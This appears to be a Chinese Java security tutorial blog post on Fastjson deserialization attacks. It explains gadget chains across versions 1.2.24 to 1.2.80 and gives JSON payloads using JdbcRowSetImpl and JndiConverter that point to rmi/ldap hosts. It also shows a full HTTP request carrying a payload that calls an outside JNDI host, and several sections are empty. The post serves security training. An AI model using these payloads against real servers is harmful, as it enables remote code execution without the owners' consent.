JAVA攻防-FastJson专题&各版本Gadget链&autoType开关&黑名单&依赖包&本地代码

知识点:

Java攻防-JNDI注入-高版本的绕过Bypass

参考文章:https://xz.aliyun.com/news/14309

参考文章:https://mp.weixin.qq.com/s/t8sjv0Zg8_KMjuW4t-bE-w

FastJson是阿里巴巴的的开源库,用于对JSON格式的数据进行解析和打包。其实简单的来说就是处理json格式的数据的。例如将json转换成一个类。或者是将一个类转换成一段json数据。Fastjson 是一个 Java 库,提供了Java 对象与 JSON 相互转换。

bash 复制代码
依赖
<dependency>
    <groupId>com.alibaba</groupId>
    <artifactId>fastjson</artifactId>
    <version>x.x.xx</version>
</dependency>
 
应用知识:
1、序列化方法:
JSON.toJSONString(),返回字符串;
JSON.toJSONBytes(),返回byte数组;

2、反序列化方法:
JSON.parseObject(),返回JsonObject;
JSON.parse(),返回Object;
JSON.parseArray(), 返回JSONArray;
将JSON对象转换为java对象:JSON.toJavaObject();
将JSON对象写入write流:JSON.writeJSONString();

3、常用:
JSON.toJSONString(),JSON.parse(),JSON.parseObject()
 

使用引出安全:
1、序列化固定类后,反序列化不指定类后:
parse方法在调用时会调用set方法
parseObject在调用时会调用set和get方法

2、序列化固定类后,反序列化指定类后:
parseObject在调用时会调用set方法

演示案例-Java攻防-FastJson-各版本gadget链分析

测试:1.2.24 1.2.47 1.2.62 1.2.80等版本差异

1.2.24版本-JDK自带链-JdbcRowSetImpl

bash 复制代码
System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
String payload = "{" +
                "\"@type\":\"com.sun.rowset.JdbcRowSetImpl\"," +
                "\"dataSourceName\":\"rmi://xx.xx.xx.xx/xxxx\", " +
                "\"autoCommit\":true" +
                "}";
JSON.parse(payload);
bash 复制代码
版本1.2.24的Payload解析:
1、反序列化对象:com.sun.rowset.JdbcRowSetImpl
2、改动的成员变量:dataSourceName、autoCommit(在进行反序列的时候会触发set方法)
3、setdataSourceName->getdataSourceName
4、setautoCommit->connect->
InitialContext.lookup(getDataSourceName());










1.2.47版本的Payload解析

bash 复制代码
{
    "aaa": {
        "@type": "java.lang.Class",
        "val": "com.sun.rowset.JdbcRowSetImpl"
    },
    "bbb": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "ldap://127.0.0.1:1234/Exploit",
        "autoCommit": true
    }
}




所以没法直接用com.sun.rowset.JdbcRowSetImpl类,需要进行间接的转换。




1.2.62版本的Payload解析

bash 复制代码
{
  "@type":"org.apache.xbean.propertyeditor.JndiConverter",
  "AsText":"rmi://127.0.0.1:1099/exploit"
}";








1.2.80版本的Payload解析







本地危险代码





总结

bash 复制代码
*1.2.47<=可利用JDK自带链实现RCE
*1.2.62-1.2.80中利用链为依赖包或本地代码
其中依赖包还需要开启autoType并设置对应白名单,这种情况在实战中只有一到两成的几率能碰到,而本地代码无需(黑盒不适用)
*1.2.80后续版本目前无

黑盒测试思路点

bash 复制代码
能不能测试核心:
1、符合java应用 有json数据传递 或者报错显示用到fastjson类
2、传递的数据不管加密或无密能识别出json格式 直接poc替换测试

POST /home/fastjson HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 112
Content-Type: application/json
Cookie: java-chains-token-key=admin_token; JSESSIONID=22BE2078F5D60DE4851FE00D9610CB51
Host: 127.0.0.1:8000
Origin: http://127.0.0.1:8000
Pragma: no-cache
Referer: http://127.0.0.1:8000/fastjson
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
X-Requested-With: XMLHttpRequest
sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Microsoft Edge";v="134"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
 
明文、加密(整体或部分)、编码(涉及到加解密的分析js逆向)
{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://jndi.fuzz.red:5/ahld/test","autoCommit":true}
相关推荐
爬山算法2 小时前
Netty(5)Netty的ByteBuf是什么?它与Java NIO的ByteBuffer有何不同?
java·开发语言·nio
爱笑的眼睛112 小时前
超越SIFT与ORB:深入OpenCV特征检测API的设计哲学与高阶实践
java·人工智能·python·ai
JH30732 小时前
Java 是值传递:深入理解参数传递机制
java·开发语言·windows
CS创新实验室2 小时前
计算机考研408【操作系统】核心知识点总结
java·linux·考研·计算机·操作系统·408
while(1){yan}2 小时前
文件IO的常识
java·开发语言·青少年编程·电脑常识
Light602 小时前
再见,REST API?你好,MCP Server!AI时代后端开发新范式
java·人工智能·rest api·ai agent·spring ai·mcp
逸风尊者2 小时前
开发需掌握的知识:MQTT协议
java·后端
帅得不敢出门3 小时前
精简Android SDK(AOSP)的git项目提高git指令速度
android·java·开发语言·git·elasticsearch
青蛙大侠公主3 小时前
Spring事务
java·数据库·spring